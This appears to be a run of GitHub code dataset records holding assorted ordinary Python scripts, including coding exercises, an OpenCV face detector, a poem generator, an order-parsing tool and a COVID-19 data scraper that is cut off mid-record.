The first line of each test case contains\ntwo space separated integers N and S, where N is the number of digits and S is the sum.\n\nOutput\n\nPrint the largest number that is possible.\nIf there is no such number, then print -1\n\nConstraints:\n\n1 <= T <= 30\n1 <= N <= 50\n0 <= S <= 500\n\nExample\n\nInput\n2\n2 9\n3 20\n\nOutput\n\n90\n992\nExpected Time Complexity: O(n)\n\n\"\"\"\n\ndef largest_number(n,s):\n if s==0:\n return -1\n digit = 9\n number = \"\"\n # Greedily place the largest possible digit at each of the n positions.\n while(s>=0 and digit >=0 and len(number)<n):\n if s-digit >= 0:\n s = s - digit\n number = number + str(digit)\n else:\n digit = digit - 1\n if s>0:\n return -1\n else:\n return number\n \n\ndef main():\n t = int(input().strip())\n for i in range(0,t):\n numbers = input().strip().split(\" \")\n n = int(numbers[0])\n k = int(numbers[1])\n print(largest_number(n,k))\n\nif __name__ == '__main__':\n main()","repo_name":"amitkmr/coding-questions","sub_path":"Greedy/largest_number_possible.py","file_name":"largest_number_possible.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"}
{"seq_id":"38786234301","text":"counter = 100 #İnteger değer\nmiles = 1000.0 #Float Değer \nname = \"John\" #String Değer\n\n#İnt değer. Tam sayı değerleri tutar. \"\" içine yazılan her şey string ifadedir. Pythonda değişkenlerin tipi belirtilmez. \nx = 10\ny = 20\nz = \"Yaren\" #String değer\ntcNo = \"45485418465146\" #Tc no genelde string olarak tutulur. Çünkü toplamıyoruz. Telefon numaralarıda öyledir. Çarpmayız,toplamayız o yüzden çift tırnak içinde tutulur.Eğer ihtiyacın olursa tip dönüşümü yapabilirsin.\n\nfloatNo = 4595.45644 #Float ondalıklı sayılardır.\n\nprint(x + 10) #Print ile ekrana yazdırırız.\nprint(\"Hello\",z)\nprint(floatNo)\nprint(type(floatNo)) #Type ile veri tipini görebiliriz. İnt mi,float mı,string mi gibi.\n\n\n\n","repo_name":"yarenahlatci/PythonNotebook","sub_path":"PYTHON-NOTEBOOK/BÖLÜM1/DEĞİŞKENLER.py","file_name":"DEĞİŞKENLER.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1509319748","text":"'''16. 
Escribir un programa que pida al usuario un número entero y muestre por pantalla si es\npar o impar'''\n\nentero = int(input(\"Por favor ingrese un número: \\n\")) \n\n#funcion que define si es par o impar\ndef ParImpar():\n num = entero%2\n if num == 0:\n print(\"El numero \", entero, \"es par\" )\n else:\n print(\"El numero \", entero, \"es impar\" )\n\n#llamado a la función\nParImpar()","repo_name":"angelagn/ApuntesPython","sub_path":"e005_pdf5/e016_ParImpar.py","file_name":"e016_ParImpar.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"10983389457","text":"import cv2 as cv\nimport numpy as np\n\nim= cv.imread('mor_teams5.jpg')\n\n\ngray = cv.cvtColor(im, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image', gray)\n\nhaar_cascade_modele = cv.CascadeClassifier('haar_face.xml') # to run this app you must first download this file ('haar_face.xml')\n\nfaces_r = haar_cascade_modele.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=11)\n\nprint(f'Number of faces found = {len(faces_r)}')\n\nfor (x,y,w,h) in faces_r:\n cv.rectangle(im, (x,y), (x+w,y+h), (0,255,0), thickness=2)\n\ncv.imshow('Detected ', im)\n\n\n\ncv.waitKey(0)\n","repo_name":"kalil75/python-project-ML-haar-cascade-detection","sub_path":"haar.py","file_name":"haar.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25847441759","text":"import time as tm\nimport random\ndictionary = []\ndef poems():\n global dictionary\n stressed_letters = ['А', 'Я', 'О', 'Ё', 'У', 'Ю', 'Э', 'Е', 'И', 'Ы']\n vowel_letters = ['а', 'я', 'о', 'ё', 'у', 'ю', 'э', 'е', 'и', 'ы']\n\n #message = 'грЕчка скОро бУдет по сОрок'\n with open('message.txt', 'r', encoding='utf-8') as mes_file:\n message = mes_file.readline()\n print(message)\n\n final_dict = {'word': '', 'letters': ''}\n\n # Получение unix-времени и времени в формате гггг-мм-дд чч:мм:сс\n unix_time = int(tm.time())\n # print(unix_time)\n str_date = tm.strftime('%Y-%m-%d %H:%M:%S', tm.localtime(unix_time))\n # print(type(unix_time))\n # print(str_date)\n # Получение времени в формате гггг-мм-дд чч:мм:сс из unix\n t = tm.strptime(str_date, '%Y-%m-%d %H:%M:%S')\n # print(int(tm.mktime(t)))\n key_list = []\n key = \"\".join(str(unix_time))\n\n # print('key=', key)\n\n def dictionary():\n data = []\n\n with open('dataset.txt', 'r', encoding='utf-8') as dict:\n for row in dict:\n data.append(row)\n\n # print(data)\n dictionary = []\n for i in data:\n current_word = ''\n for j in i:\n if j != '\\n':\n current_word += j\n else:\n break\n dictionary.append(current_word)\n\n for i in dictionary:\n dictionary.remove('')\n\n return dictionary\n\n dictionary = dictionary()\n\n # print(dictionary)\n\n def get_stressed_syllable(word):\n # получаем номер уданого слога\n # print(word)\n count = 0\n stressed_letter_num = 0\n # print(count)\n for i in word:\n if i in vowel_letters:\n count += 1\n # print(count, i)\n if i in stressed_letters:\n count += 1\n stressed_letter_num = count\n # print(\"stressed_letter\")\n final_dict.update({'word': word, 'stressed': [count, stressed_letter_num]})\n return count, stressed_letter_num\n\n def message_moving(message, key):\n message = message.split()\n print(message)\n empty_word = '*****'\n poem_first_stage = [i for i in range(34)]\n # print(len(poem_first_stage))\n current_number = 0\n summ_num = current_number\n for i in range(len(message)):\n current_number = 
int(key[i])\n # print(current_number)\n summ_num += current_number\n # print(summ_num)\n poem_first_stage[summ_num] = message[i]\n poem_first_stage.pop(0)\n for i in poem_first_stage:\n if i not in message:\n poem_first_stage[poem_first_stage.index(i)] = empty_word\n return poem_first_stage\n\n def delete_words_from_dictionary():\n #global dictionary\n for i in dictionary:\n if get_stressed_syllable(i)[0] > 2:\n dictionary.remove(i)\n\n def poem_generate(poem):\n\n ending = ['на', 'го', 'ия']\n variant = 0 # Для случайного выбора одного из вариантов окончания слов в коцне строки для рифмы\n #global dictionary\n not_this_words = [] # чтобы слова не повторялись, будем добавлять их сюда\n for j in dictionary:\n if len(j) > 1:\n if (j[-2] + j[-1] == ending[variant]):\n word = j + '8'\n not_this_words.append(j)\n # print(not_this_words)\n local_stessed = 0\n\n if get_stressed_syllable(poem[0])[1] == 1:\n ending_str = [3, 7, 11, 15, 19, 23, 27]\n global_stressed = [3, 5, 7, 9, 11] # номера ударных слогов\n current_stressed = 0 # Текущая сумма слогов в ударении\n for i in range(len(poem)):\n\n if poem[i] == '*****':\n stress = get_stressed_syllable(poem[i])[0]\n current_stressed += stress\n flag = False\n\n while flag == False:\n\n # print(i, end = '')\n if i in ending_str:\n word = not_this_words[random.randint(0, len(not_this_words) - 1)]\n else:\n\n word = dictionary[random.randint(0, len(dictionary) - 1)]\n if get_stressed_syllable(word)[1] == 2 and word not in poem:\n flag = True\n # print(flag)\n poem[i] = word\n\n print(not_this_words)\n\n # return poem2\n\n # 1 7 9 12 17\n\n '''\n Описание алгоритма:\n 1. Сумма слогов первой строки = 9\n 2. Сумма слогов второй строки = 8\n 3. Ударные слоги - чётные\n\n 4. Берём слово, определяем его номер.\n 5. Определяем номер этого слова в строке\n 6. Если номер слова в строке - пятый, то запоминаем последние две буквы \n 7. Заполняем все слова ДО рассматриваемого:\n 9. Нужно, чтобы на каждой строчке было 5 слов\n\n\n 5. повторяем так со всеми словами\n 6. \n 7. 
\n '''\n\n form = \"\"\"_*_*_*_*_\n _*_*_*_*\"\"\"\n\n def print_poem(poem):\n data = ''\n try:\n num = 0\n for i in range(7):\n for j in range(4):\n print(poem[num], end=' ')\n data += poem[num]\n data += ' '\n num += 1\n print()\n data += '\\n'\n\n except IndexError:\n pass\n return data\n def save_poem(poem):\n # Получение unix-времени и времени в формате гггг-мм-дд чч:мм:сс\n unix_time = int(tm.time())\n # print(unix_time)\n str_date = tm.strftime('%Y-%m-%d %H:%M:%S', tm.localtime(unix_time))\n # print(type(unix_time))\n with open('result.txt', 'w', encoding='utf-8') as poem_file:\n poem_file.writelines(poem)\n #poem_file.writelines(str_date)\n\n # print(poem1)\n delete_words_from_dictionary()\n poem1 = message_moving(message, key)\n\n poem_generate(poem1)\n\n\n save_poem(print_poem(poem1))\n\n\n\nif __name__ == '__main__':\n poems()","repo_name":"ilikecinepol/the_poem_encoder","sub_path":"poem.py","file_name":"poem.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18848470702","text":"#Write a program to use the loop to find the factorial of a given number.\n\nno = int(input(\"Enter Number : \"))\n\nf = 1\n\nfor i in range(no,0,-1):\n f *= i\nelse:\n print(\"Factorial of\",no,\"is : \",f)\n","repo_name":"KRUTIKHIRAPARA/Python","sub_path":"Python_Exercise-1/PY_E1_13.py","file_name":"PY_E1_13.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2593276772","text":"if __name__ == \"__main__\":\n with open('day08/input') as input_file:\n input = [\n line.strip().split(\" | \") for line in input_file.readlines()\n ]\n input_signals, output_signals = [], []\n for line in input:\n input_signals.append(\n [\"\".join(sorted(signal)) for signal in line[0].split()]\n )\n output_signals.append(\n [\"\".join(sorted(signal)) for signal in line[1].split()]\n )\n\n first_solution = 0\n for output_signal in output_signals:\n first_solution += len([\n output for output in output_signal\n if len(output) in [2, 3, 4, 7]\n ])\n\n second_solution = 0\n for i in range(len(input)):\n input_line = input_signals[i]\n output_line = output_signals[i]\n signal_patterns = {\n \"1\": next(signal for signal in input_line if len(signal) == 2),\n \"7\": next(signal for signal in input_line if len(signal) == 3),\n \"4\": next(signal for signal in input_line if len(signal) == 4),\n \"8\": next(signal for signal in input_line if len(signal) == 7)\n }\n five_length_signals = [\n signal for signal in input_line if len(signal) == 5\n ]\n six_length_signals = [\n signal for signal in input_line if len(signal) == 6\n ]\n\n for signal in six_length_signals:\n if all(\n char in signal\n for char in signal_patterns[\"4\"] + signal_patterns[\"7\"]\n ):\n signal_patterns[\"9\"] = signal\n elif all(char in signal for char in signal_patterns[\"7\"]):\n signal_patterns[\"0\"] = signal\n else:\n signal_patterns[\"6\"] = signal\n\n for signal in five_length_signals:\n missing_from_six = \"\".join(\n char for char in \"abcdefg\" if char not in signal_patterns[\"6\"]\n )\n if all(char in signal for char in signal_patterns[\"1\"]):\n signal_patterns[\"3\"] = signal\n elif missing_from_six in signal:\n signal_patterns[\"2\"] = signal\n else:\n signal_patterns[\"5\"] = signal\n value_for_signal = {\n signal: number for number, signal in signal_patterns.items()\n }\n second_solution += int(\n \"\".join([value_for_signal[output] for 
output in output_line])\n )\n\n print(\n f\"\"\"Day 8:\n first solution: {first_solution}\n second solution: {second_solution}\"\"\"\n )\n","repo_name":"DanielElisenberg/aoc2021","sub_path":"day08/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"43422729063","text":"from copy import copy\nfrom datetime import datetime\n\nfrom django.conf import settings\n\nimport requests\n\n\ndef get_idservice(test=False):\n if test or settings.DEBUG:\n kwargs = copy(settings.TEST_IDSERVICE) \n else:\n kwargs = copy(settings.IDSERVICE)\n return IDService(**kwargs)\n\n\ndef mintandbind(objtype, objurl='', description=''):\n idservice = get_idservice()\n data = idservice.mint(1)\n id = data['identifier']\n idservice.bind(id=id, objurl=objurl, objtype=objtype, desc=description)\n return id\n\n\nclass IDService():\n\n def __init__(self, requester, minter, url, port=80):\n self.minter = minter\n self.url = url if url.startswith('http') else 'http://%s' % url\n self.port = port\n if port != 80:\n self.baseurl = '%s:%s' % (url, port)\n else:\n self.baseurl = url\n\n def __str__(self):\n return '<IDService %s %s>' % (self.minter, self.url)\n\n def mint(self, quantity=1):\n url = '%s/mint/%s/%s' % (self.baseurl, self.minter, quantity)\n response = requests.get(url)\n if response.status_code != 200:\n raise self.IDServiceError(response.text)\n data = response.json()\n if quantity==1: data = data[0]\n return data\n\n def bind(self, id, objurl, objtype='', desc=''):\n url = '%s/bind/%s' % (self.baseurl, id)\n params = {'object_url': objurl, 'object_type': objtype,\n 'description': desc}\n response = requests.get(url, params=params)\n if response.status_code != 200:\n raise self.IDServiceError(response.text)\n return response.json()[0]\n\n def lookup(self, id):\n url = '%s/lookup/%s' % (self.baseurl, id)\n response = requests.get(url)\n if response.status_code != 200:\n raise self.IDServiceError(response.text)\n return response.json()[0]\n\n class IDServiceError(Exception):\n\n def __init__(self, msg):\n self.msg = msg\n\n def __repr__(self):\n return self.msg\n","repo_name":"gwu-libraries/inventory_old","sub_path":"inv/invapp/idservice.py","file_name":"idservice.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"13158364893","text":"# jsonData.py\n__version__ = \"v20200801\"\n# Built-In Libraries\nimport json\nimport os\nimport glob\nfrom datetime import datetime\n# Downloaded Libraries\nimport PyPDF2\n# Local Files\nimport files\nimport PostScript\nimport order as o\nimport log\n\n\ndef json_data(order):\n \"\"\"\n Generates the JSON/DICT for the current order.\n\n Parameters: \n order (object): The object containing all the information for the current order.\n\n Returns: \n json/dict: The JSON/DICT for the order.\n \"\"\"\n json_Data = {'Account ID': 'CHANGE ME'}\n json_Data[\"Order Number\"] = order.NUMBER\n json_Data[\"Order Subject\"] = order.SUBJECT\n FILES = files.file_list(order)\n # Imports the Email contents line by line.\n email = []\n with open(\"\".join([order.OD, '/', order.NAME, '/', order.NAME, \".txt\"]), \"r\") as f:\n for line in f.readlines():\n email.append(line.rstrip('\\n'))\n json_Data[\"Email ID\"] = email[0][2:]\n json_Data[\"Files\"] = {}\n # This gets the number of pages for every pdf file for the job.\n for i in range(len(FILES)):\n try:\n f = open('/'.join([order.OD, 
order.NAME, FILES[i]]), \"rb\")\n pdf = PyPDF2.PdfFileReader(f)\n json_Data[\"Files\"][\"\".join([\"File \", str(\n i+1)])] = {\"File Name\": FILES[i], \"Page Count\": str(pdf.getNumPages())}\n f.close()\n except:\n log.logger.exception(\"Using Alternative Page Count Source\")\n pdf = files.page_count(\n '/'.join([order.OD, order.NAME, FILES[i]]))\n json_Data[\"Files\"][\"\".join([\"File \", str(\n i+1)])] = {\"File Name\": FILES[i], \"Page Count\": str(pdf)}\n # Removes the duplicate portion of the email that contains html (form) code.\n for i in range(len(email)):\n if \"IF YOU HAVE ANY QUESTIONS\" in email[i]:\n email = email[8:-(len(email)-i)]\n break\n # Searches for required elements from the form for the JSON file.\n for i in range(len(email)):\n test_string = \"Timestamp\"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Date Ordered\"] = line[1]\n test_string = \"*Timestamp: *\"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Date Ordered\"] = line[1]\n test_string = \"Email address \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Email\"] = line[1]\n test_string = \"Your Last Name \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Last Name\"] = line[1]\n test_string = \"Your First Name \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"First Name\"] = line[1]\n test_string = \"Your Call Back Number \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Phone Number\"] = line[1]\n test_string = \"Your building \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Building\"] = line[1]\n test_string = \"Number of Copies Needed per File \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Copies\"] = line[1]\n test_string = \"Printing Setup \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Duplex\"] = line[1]\n test_string = \"Collated or Uncollated \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Collation\"] = line[1]\n test_string = \"Paper Size, Type, and Color \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Paper\"] = line[1].replace(\"=E2=80=93 \", \"\")\n test_string = \"Stapling \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Stapling\"] = line[1]\n test_string = \"Drilling - Three Hole Punch \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Drilling\"] = line[1]\n test_string = \"Folding \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Folding\"] = line[1]\n test_string = \"Cutting \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Cutting\"] = line[1]\n test_string = \"Slip Sheets and/or Shrink Wrap \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n extra = \"\"\n j = 1\n while(not (\"Special Instructions \" in email[i+j] or \"Deliver to: \" in email[i+j])):\n extra = \"\".join([\" \", extra, \" \", email[i+j]])\n j += 1\n json_Data[\"Slip Sheets / Shrink Wrap\"] = \"\".join(\n [line[1], extra])\n test_string = \"Special Instructions \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n extra = \"\"\n j = 1\n while(not(\"Deliver to: \" in email[i+j])):\n extra = \"\".join([\" \", extra, \" \", email[i+j]])\n j += 1\n json_Data[\"Special 
Instructions\"] = \"\".join([line[1], extra])\n test_string = \"Booklet Fold and Staple \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Booklets\"] = line[1]\n test_string = \"Front Cover \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Front Cover\"] = line[1].replace(\"=E2=80=93 \", \"\")\n test_string = \"Back Cover \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Back Cover\"] = line[1].replace(\"=E2=80=93 \", \"\")\n test_string = \"Deliver to: (Staff Member's Name) \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Deliver To Name\"] = line[1]\n test_string = \"Deliver To:\"\n if test_string in email[i]:\n line = email[i].split(test_string)\n line2 = \"\"\n if (\"@\" not in email[i+1]):\n if len(email[i+1]) == 5:\n line2 = \" \" + email[i+1]\n else:\n line2 = email[i+1]\n json_Data[\"Deliver To Address\"] = (line[1].replace(\n \"=\", \"\").strip() + line2).strip()\n json_Data[\"Status\"] = order.status = \"NotStarted\"\n json_Data[\"Cost\"] = order.COST = 0\n # Creates the JSON file\n with open(\"\".join([order.OD, '/', order.NAME, '/', order.NAME, '.json']), 'w') as outfile:\n json.dump(json_Data, outfile, indent=4, separators=(',', ': '))\n return json_Data\n\n\ndef orderStatusExport(order, STATUS, DATE):\n \"\"\"\n Exports the Status of the order with the date time.\n\n Puts in the JSON file whether the Ticket or the Order has been printed.\n\n Parameters: \n order (object): The object containing all the information for the current order.\n STATUS (str) : The status of the order.\n DATE (str) : The Date which it was modified.\n\n Returns: \n void: Unused Return\n \"\"\"\n JSON_PATH = \"\".join(\n [order.OD, '/', order.NAME, '/', order.NAME, '.json'])\n with open(JSON_PATH) as json_file:\n JOB_INFO = json.load(json_file)\n now = datetime.now()\n current_time = \"\"\n if(DATE):\n current_time = \"_\" + now.strftime(\"%Y%m%d:%H%M\")\n order.status = STATUS + current_time\n JOB_INFO[\"Status\"] = order.status\n with open(JSON_PATH, 'w') as outfile:\n json.dump(JOB_INFO, outfile, indent=4, separators=(',', ': '))\n\n\ndef main(OUTPUT_DIRECTORY):\n log.logInit(\"JSON\")\n print = log.Print\n input = log.Input\n Start = str(input(\"Start #: \"))\n End = str(input(\"End #: \"))\n folders = files.folder_list(OUTPUT_DIRECTORY)\n ORDER_NAMES = []\n for ORDER_NUMBER in range(int(Start), int(End)+1):\n ORDER_NUMBER = str(ORDER_NUMBER).zfill(5)\n for i in folders: # Searches for Requested Order Number from list of currently downloaded orders\n if ORDER_NUMBER in i:\n ORDER_NAMES.append(i)\n for ORDER_NAME in ORDER_NAMES:\n print(ORDER_NAME)\n order = o.Order()\n order.NAME = ORDER_NAME\n order.NUMBER = ORDER_NAME[:10]\n order.SUBJECT = ORDER_NAME[11:]\n order.OD = OUTPUT_DIRECTORY\n json_data(order)\n\n\nif __name__ == \"__main__\":\n main(\"SO/\")\n","repo_name":"ArthurVardevanyan/CPD_SO_Automated_Printing","sub_path":"jsonData.py","file_name":"jsonData.py","file_ext":"py","file_size_in_byte":8678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"15975615340","text":"# -*- coding: utf-8 -*-\nimport time,datetime, json, requests,pymysql\nimport pandas as pd\nimport traceback\nfrom selenium.webdriver import Chrome, ChromeOptions\nimport sys\n\n# ----------------数据库连接、关闭------------------------\n#连接数据库\ndef get_conn():\n #建立连接\n connect = pymysql.Connect(\n host='localhost',\n port=3306,\n 
user='root',\n passwd='123456',\n db='cov',\n charset='utf8'\n )\n #获取游标\n cursor = connect.cursor()\n return connect,cursor\n\n#关闭连接\ndef close_conn(connect,cursor):\n if connect:\n connect.close()\n if cursor:\n cursor.close()\n\n# ----------------爬取数据------------------------\n\n# 抓取腾讯疫情国内每日实时详细各省市和中国每日历史数据\ndef get_tencent_data():\n url1 = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5&callback=&_=%d'%int(time.time()*1000)\n url2 = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_other&callback=&_=%d'%int(time.time()*1000)\n headers = {\n 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n r1 = requests.get(url1, headers)\n r2 = requests.get(url2, headers)\n\n #json字符串转字典\n res1 = json.loads(r1.text)\n res2 = json.loads(r2.text)\n\n data_all1 = json.loads(res1[\"data\"])\n data_all2 = json.loads(res2[\"data\"])\n\n #当日详细数据\n details = []\n update_time = data_all1[\"lastUpdateTime\"]\n data_country = data_all1[\"areaTree\"]\n data_province = data_country[0][\"children\"]\n for pro_infos in data_province:\n province = pro_infos[\"name\"]\n for city_infos in pro_infos[\"children\"]:\n city = city_infos[\"name\"]\n confirm = city_infos[\"total\"][\"confirm\"]\n confirm_add = city_infos[\"today\"][\"confirm\"]\n nowConfirm = city_infos['total']['nowConfirm']\n suspect = city_infos[\"total\"][\"suspect\"]\n heal = city_infos[\"total\"][\"heal\"]\n dead = city_infos[\"total\"][\"dead\"]\n dead_rate = city_infos['total']['deadRate']\n heal_rate = city_infos['total']['healRate']\n details.append([update_time, province, city,nowConfirm, confirm, confirm_add, suspect,heal, dead,dead_rate,heal_rate])\n\n #历史数据\n history = {}\n for day_infos in data_all2[\"chinaDayList\"]:\n ds = day_infos[\"y\"]+\".\"+day_infos[\"date\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup) #改变时间输入格式,不然插入数据库会报错,数据库是datatime格式\n confirm = day_infos[\"confirm\"]\n suspect = day_infos[\"suspect\"]\n heal = day_infos[\"heal\"]\n dead = day_infos[\"dead\"]\n nowConfirm = day_infos[\"nowConfirm\"]\n nowSevere = day_infos[\"nowSevere\"]\n importedCase = day_infos[\"importedCase\"]\n noInfect = day_infos[\"noInfect\"]\n localConfirm = day_infos[\"localConfirm\"]\n dead_rate = day_infos[\"deadRate\"]\n heal_rate = day_infos[\"healRate\"]\n history[ds] = {\"confirm\":confirm, \"suspect\":suspect, \"heal\":heal, \"dead\":dead,\n \"importedCase\": importedCase, \"noInfect\": noInfect, \"localConfirm\":localConfirm, \"nowConfirm\":nowConfirm,\n \"nowSevere\":nowSevere, \"dead_rate\":dead_rate, \"heal_rate\":heal_rate}\n for day_infos in data_all2[\"chinaDayAddList\"]:\n ds = day_infos[\"y\"]+\".\"+day_infos[\"date\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup) #改变时间输入格式,不然插入数据库会报错,数据库是datatime格式\n confirm = day_infos[\"confirm\"]\n suspect = day_infos[\"suspect\"]\n heal = day_infos[\"heal\"]\n dead = day_infos[\"dead\"]\n importedCase = day_infos[\"importedCase\"]\n noInfect = day_infos[\"infect\"]\n dead_rate = day_infos[\"deadRate\"]\n heal_rate = day_infos[\"healRate\"]\n localConfirm = day_infos[\"localConfirmadd\"]\n history[ds].update({\"confirm_add\":confirm, \"suspect_add\":suspect, \"heal_add\":heal, \"dead_add\":dead,\n \"importedCase_add\": importedCase, \"noInfect_add\": noInfect, \"localConfirm_add\":localConfirm,\n \"dead_rate_add\":dead_rate, \"heal_rate_add\":heal_rate})\n return history,details\n\n# 抓取各省从2020到2021的每日历史数据(无市区)\ndef 
get_province_history_data():\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36\"\n }\n url = \"http://111.231.75.86:8000/api/provinces/CHN/daily/\"\n\n response = requests.get(url=url, headers=headers)\n res = json.loads(response.text)\n details = []\n for infos in res:\n ds = datetime.datetime.strptime(str(infos[\"dateId\"]), '%Y%m%d').strftime('%Y-%m-%d')\n province = infos[\"provinceName\"]\n province_code = infos[\"provinceCode\"]\n nowConfirm = infos[\"currentConfirmedCount\"]\n nowConfirm_add = infos[\"currentConfirmedIncr\"]\n confirm = infos[\"confirmedCount\"]\n confirm_add = infos[\"confirmedIncr\"]\n suspect = infos[\"suspectedCount\"]\n suspect_add = infos[\"suspectedCountIncr\"]\n heal = infos[\"curedCount\"]\n dead = infos[\"deadCount\"]\n heal_add = infos[\"curedIncr\"]\n dead_add = infos[\"deadIncr\"]\n nowSevere = infos[\"highDangerCount\"]\n nowMidSevere = infos[\"midDangerCount\"]\n details.append(\n [ds, province,province_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add, dead, dead_add, nowSevere, nowMidSevere])\n\n return details\n\n\n# 抓取本土风险划分数据\ndef get_localrisk_data():\n url = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_other&callback=&_=%d' % int(time.time() * 1000)\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n r = requests.get(url, headers)\n res = json.loads(r.text)\n data_all = json.loads(res[\"data\"])\n locallist = []\n for local in data_all[\"statisGradeCityDetail\"]:\n ds = str(local[\"syear\"]) + \"/\" + local[\"date\"]\n tup = time.strptime(ds, \"%Y/%m/%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup) # 改变时间输入格式,不然插入数据库会报错,数据库是datatime格式\n province = local[\"province\"]\n city = local[\"city\"]\n nowConfirm = local[\"nowConfirm\"]\n confirm = local[\"confirm\"]\n confirm_add = local[\"confirmAdd\"]\n heal = local[\"heal\"]\n dead = local[\"dead\"]\n grade = local[\"grade\"]\n locallist.append([ds, province,city,nowConfirm,confirm,confirm_add,heal,dead,grade])\n return locallist\n\n#抓取全球各国以及美国各洲最新的数据\ndef get_global_country_latest_data():\n url = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_foreign&callback=&_=%d' % int(time.time() * 1000)\n url2 = \"https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist\"\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n s = requests.session()\n s.keep_alive = False\n requests.DEFAULT_RETRIES = 5\n\n # 各国各城市数据\n details = []\n america = []\n\n #获取美国数据\n r1 = requests.get(url, headers)\n res1 = json.loads(r1.text)\n data_all = json.loads(res1[\"data\"])\n\n # 获取全球数据\n r2 = requests.post(url=url2, headers=headers)\n res2 = json.loads(r2.text)\n # print(res[\"data\"])\n for infos in res2[\"data\"]:\n ds = infos[\"y\"] + \".\" + infos[\"date\"]\n country = infos[\"name\"]\n continent = infos[\"continent\"]\n nowConfirm = infos[\"nowConfirm\"]\n nowConfirm_add = infos[\"nowConfirmCompare\"]\n confirm = infos[\"confirm\"]\n confirm_add = infos[\"confirmCompare\"]\n suspect = infos[\"suspect\"]\n heal = infos[\"heal\"]\n dead = infos[\"dead\"]\n heal_add = infos[\"healCompare\"]\n dead_add = infos[\"deadCompare\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup)\n details.append([ds,country, continent, 
